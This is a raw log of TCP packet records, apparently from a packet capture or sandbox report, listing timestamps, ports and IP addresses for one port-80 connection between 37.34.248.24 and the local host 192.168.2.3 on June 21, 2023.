Jun 21, 2023 04:27:39.777941942 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.777997017 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.778484106 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.778532982 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.778578043 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.778580904 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.778671980 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.778697014 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.779647112 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.779695988 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.779716015 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.779743910 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.779791117 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.779819012 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.779838085 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.779906988 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.805429935 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.864803076 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.864872932 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.865020037 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.865587950 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.865639925 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.865686893 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.865899086 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.881830931 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.881899118 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.881946087 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.881948948 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.881999969 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.882040024 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.882704973 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.882754087 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.882801056 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.882802010 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.882853031 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.882896900 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.883610964 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.883658886 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.883706093 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.883722067 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.883755922 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.883802891 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.883843899 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.884284973 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.884617090 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.884666920 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.884713888 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.884762049 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.884808064 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.884846926 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.885519028 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.885567904 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.885613918 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.885656118 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.885658979 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.885709047 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.886472940 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.886522055 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.886570930 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.886574030 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.886621952 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.886635065 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.887620926 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.887665987 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.887712002 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.887720108 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.887758970 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.887804031 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.887805939 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.888544083 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.888917923 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.891689062 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.891740084 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.891788960 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.892643929 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.892693043 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.892702103 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.892740965 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.892787933 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.892788887 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.892839909 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.892885923 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.893574953 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.893621922 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.893667936 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.893716097 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.893762112 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.894649982 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.894697905 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.894745111 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.894789934 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.894790888 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.894839048 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.894885063 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.895247936 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.895400047 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.896357059 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.897511959 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.897562027 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.901787043 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.901837111 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.901869059 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.901885986 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.902070045 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.902714014 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.902764082 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.902810097 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.902836084 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.902858019 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.902911901 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.903570890 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.903618097 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.903661966 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.903671980 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.903708935 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.903759003 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.903764009 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.904642105 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.904690027 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.904707909 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.904736042 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.904782057 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.904792070 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.904908895 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.905715942 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.905764103 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.905808926 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.905854940 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.905865908 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.905909061 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.905978918 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.906687021 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.906733990 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.906780958 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.906826019 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.906981945 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.907051086 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.907702923 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.907748938 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.907792091 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.907840967 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.907841921 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.908508062 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.908550978 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.908574104 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.908622980 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.908655882 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.908670902 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.908776999 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.908818960 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.909527063 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.909653902 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.909699917 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.909746885 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.909794092 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.909822941 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.909986019 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.910583019 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.910631895 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.910680056 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.910725117 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.910912037 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.911679983 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.911727905 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.911775112 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.911813021 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.911820889 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.912575006 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.912612915 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.912617922 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.912673950 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.912705898 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.912717104 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.912760019 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.912791967 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.913516045 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.913558960 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.913595915 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.913603067 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.913646936 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.913680077 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.914663076 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.914705038 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.914742947 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.914747000 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.914788961 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.914820910 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.914829969 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.915246010 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.915766954 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.915812969 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.915862083 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.915898085 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.915910006 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.919066906 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.924534082 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.924582005 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.924628019 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.924671888 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.924716949 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.924762011 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.924762964 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.924762964 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.924806118 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.924839973 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.981539965 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.989589930 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.989651918 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.989696980 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.989798069 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.005853891 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.005939960 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.005989075 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.006032944 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.006041050 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.006078959 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.006095886 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.006217957 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.006678104 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.006726980 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.006773949 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.006819963 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.006866932 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.006915092 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.007488966 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.007535934 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.007678032 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.015769005 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.015830994 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.015880108 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.015932083 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.015957117 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.016010046 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.016639948 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.016689062 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.016732931 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.016781092 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.016801119 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.016829014 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.016839027 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.017630100 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.017677069 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.017724991 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.017755985 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.017774105 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.017787933 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.018486977 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.018637896 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.018685102 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.018712044 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.018729925 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.018738031 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.018775940 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.018942118 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.019602060 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.019649029 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.019695997 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.019747972 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.019768953 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.019812107 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.028630972 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.028677940 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.028727055 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.028776884 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.028815031 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.028822899 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.028872013 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.028875113 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.028928041 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.028939009 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.028975964 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.029025078 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.029072046 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.029093027 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.029129982 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.029136896 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.029177904 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.029223919 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.029270887 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.029289007 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.029315948 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.029325008 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.029364109 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.029412031 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.029457092 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.029474020 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.029505014 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.029514074 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.029551983 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.029598951 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.029652119 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.029664040 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.029700994 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.029709101 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.029748917 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.029797077 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.029843092 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.029856920 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.029890060 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.029905081 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.029938936 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.029984951 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.030033112 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.030049086 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.030080080 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.030090094 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.030128002 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.030174971 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.030220985 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.030232906 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.030271053 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.030276060 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.030318022 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.030364990 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.030411005 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.030421972 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.030458927 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.030471087 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.030509949 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.030559063 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.030605078 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.030621052 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.030653954 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.030672073 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.030703068 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.031763077 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.031807899 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.031840086 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.031853914 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.031867981 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.032782078 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.032830000 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.032862902 CEST	49701	80	192.168.2.3	37.34.248.24
